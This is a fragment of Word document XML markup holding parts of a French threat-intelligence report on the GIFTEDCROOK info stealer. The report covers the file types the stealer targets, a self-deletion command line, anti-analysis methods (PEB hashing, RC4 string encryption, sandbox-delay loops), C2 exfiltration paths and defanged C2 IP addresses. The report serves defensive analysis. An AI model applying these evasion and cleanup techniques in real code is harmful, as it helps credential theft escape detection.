              <wp:posOffset>5387563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2813087" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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308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.rar, .zip, .7z, .cab, .gzip, .tar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17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5391173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="571190" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1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Archives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27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5762013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="563763" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7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3792" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2071369</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5844763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3221710" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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171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.kdbx (KeePass), .ovpn (OpenVPN), .conf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48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5935368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="618129" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1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sensibles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5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6526553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Cette capacité de vol de fichiers correspond à l’évolution documentée par Arctic Wolf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39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, qui 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6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6699908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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signalé que des versions intermédiaires de GIFTEDCROOK intégraient déjà la collecte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7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6870330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2534803" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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480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avant le passage à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8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7276893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1373471" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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3471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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.3. Auto-supression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9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7584705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Après l’exfiltration,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 supprime les trois artefacts de transit du disque.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0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7767343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4234660" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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346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opérations de suppression suivantes s’exécutent alors dans l’ordre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1984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8057738</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5608065" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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806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1.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CreateProcessW</w:t>
                        </w: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 avec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CREATE_NO_WINDOW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 lance la commande </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="1"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">cmd.exe /c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3008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8273003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5366903" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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690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4"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">"timeout /t 5 &amp; del"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 afin de supprimer un fichier intermédiaire après un délai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403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8469653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="983282" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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328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5 secondes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505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8658448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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11"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2. 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Deux appels à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DeleteFileW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suppriment les fichiers restants, y compris le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608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8873713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2779775" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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97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Powershell situé dans </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="-5"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">C:\ProgramData\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7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5353341" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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334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39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https://arcticwolf.com/resources/blog/giftedcrook-strategic-pivot-from-browser-stealer-to-data-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8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1149768" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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976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exfiltration-platform/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915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017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0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22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324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9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45734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7983229</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2832735" cy="349885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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735" cy="349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2735" h="349885">
                          <a:moveTo>
                            <a:pt x="1976120" y="349885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2832735" y="349885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2832735" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1976120" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1976120" y="349885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1975484" y="349885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1975484" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="349885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1976120" y="349885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2832735" y="349885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2832735" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1976120" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1976120" y="349885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1975484" y="349885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1975484" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="34988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74752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7983229</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2839719" cy="1774190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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9719" cy="17741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9719" h="1774190">
                          <a:moveTo>
                            <a:pt x="2836544" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2836544" y="1774190"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1979295" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1979295" y="1767840"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="1774190"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1771014"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2839719" y="1771014"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1416685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2833369" y="1416685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1062355"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2833369" y="1062355"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="708025"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2833369" y="708025"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2833369" y="353695"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2839719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78848" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1350645</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2675899</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="854713" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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71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70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854709" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="85470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2944" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3410584</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2675899</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="853443" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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44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344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853440" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="85344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7040" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5427345</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3585219</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="527053" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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05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05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527050" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="52705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9088" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3888105</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4320549</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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1136" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2371725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4320549</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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5232" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4281805</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5055879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="854713" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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71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709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854709" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="85470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7280" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6151245</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7235199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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9328" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4559935</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7235199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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07520" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1393190</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7451099</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1219199" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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99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99" h="414020">
                          <a:moveTo>
                            <a:pt x="446405" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="446405" y="214630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1218565" y="214630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1218565" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="445770" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1219199" y="21526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445134" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="445134" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="44577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0854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3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0956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3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0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3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Une fois le nettoyage terminé, aucun mécanisme de démarrage ni aucun fichier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1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3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intermédiaire ne subsiste sur le terminal ; l'</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">info stealer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 fonctionne selon un principe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2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1239212" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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921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d’exécution unique.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3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1704133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1667527" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7527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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.4. Mesures anti-analyse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4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2011945</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Pour résister à l’analyse statique et à l’analyse en bac à sable,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combine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5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2194583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1386316" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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63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plusieurs techniques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6736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2469538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5564388" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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43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11"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1. 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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Parcours du </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Process Environment Block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9"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">(P</w:t>
                        </w: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EB) avec hachage FNV-1a (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seed</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="23"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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7760" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1369694</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2661508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5367538" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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753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0x811c9dc5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, nombre premier :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0x01000193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) : cette technique résout les adresses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878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2858158</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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API lors de l’exécution en parcourant le PEB et en hachant les noms des modules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980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3031513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="936203" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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62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des fonctions.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083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3204868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565658" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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6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11"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2. 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Tables de chaînes de caractères chiffrées en RC4 à double couche : plus de 100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185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3378223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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chaînes (chemins d’accès au navigateur, extensions de fichiers, n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oms de r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épertoires,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288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3570193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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URL C2) sont chiffrées individuellement en RC4 dans la section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.rdata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 à l’aide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390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3766843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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clés propres à chaque chaîne ; les URL du C2 utilisent un encodage ASCII RC4.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492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3940198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4322328" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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23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Toutes les chaînes ne sont déchiffrées qu’au moment de l’exécution.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5952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4113553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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11"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3.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Remplissage an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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ti-analyse de la fonctio</w:t>
                        </w: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n d’identité : des milliers d’appels à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697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4305523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5384683" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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46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fonction triviale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mov eax, ecx ; ret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 sont disséminés dans tout le code. Chaque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800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4502173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9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appel semble passer une constante significative, mais la fonction la renvoie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902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4675528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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inchangée. Cela augmente la taille du code et le temps d’analyse sans affecter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0048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4848883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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fonctionnalité. Par ailleurs, des boucles de déla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i du générateu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r de nombres aléatoires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107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5040853</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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à chaîne linéaire (LCG PRNG) (multiplicateur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0x41C64E6D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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">) introduisent des délais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209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5237503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4710275" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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102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d’exécution variables afin de dépasser les fenêtres d’analyse des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sandbox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3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5773375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5389164" cy="262309"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9164" cy="2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34"/>
                          </w:rPr>
                          <w:t xml:space="preserve">5. Communication avec le serveur de commande et contrôle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4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6227468</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Avant d’exfiltrer les données, la DLL envoie une requête HTTP GET vers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5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6397890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">http://1[.]1[.]1[.]1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afin de vérifier la connectivité. La requête utilise l’adresse IP DNS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6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6580528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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publique de Cloudflare sur un port non standard pour vérifier l’accès à Internet sans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7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6753883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2419118" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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91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dépendre de la résolution de domaine.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8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7028838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Les identifiants volés sont chiffrés à l’aide d’un chiffrem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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ent RC4 à double couc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he, puis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9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7220808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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envoyés via une requête POST HTTPS sous le format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multipart/form-data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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> vers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0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7437778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="529396" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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39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chemin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1312" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1412874</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7436073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5323723" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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37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/rcv/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sur des serveurs C2 dédiés. La clé RC4 principale sert également de chaîne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2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7653043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="974760" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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47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délimitation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3360" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1858645</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7651338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="829828" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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982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multipart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4384" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1315084</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7994038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1184075" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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40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Adresse IP du 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5408" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3166745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7994038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="314842" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8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64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8339085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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166[.]0[.]132[.]237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7456" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2912745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8346463</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7044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84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8693415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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136[.]0[.]141[.]41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9504" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2912745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8700793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9580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05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9047745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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136[.]0[.]141[.]138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1552" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2912745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9055123</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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8406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25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9402075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1569459" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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45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38[.]225[.]209[.]229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00" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2912745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9409453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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9623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46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39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564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39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667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3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769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3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872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3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56076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2832735" cy="351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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73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2735" h="351155">
                          <a:moveTo>
                            <a:pt x="1976120" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2832735" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2832735" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
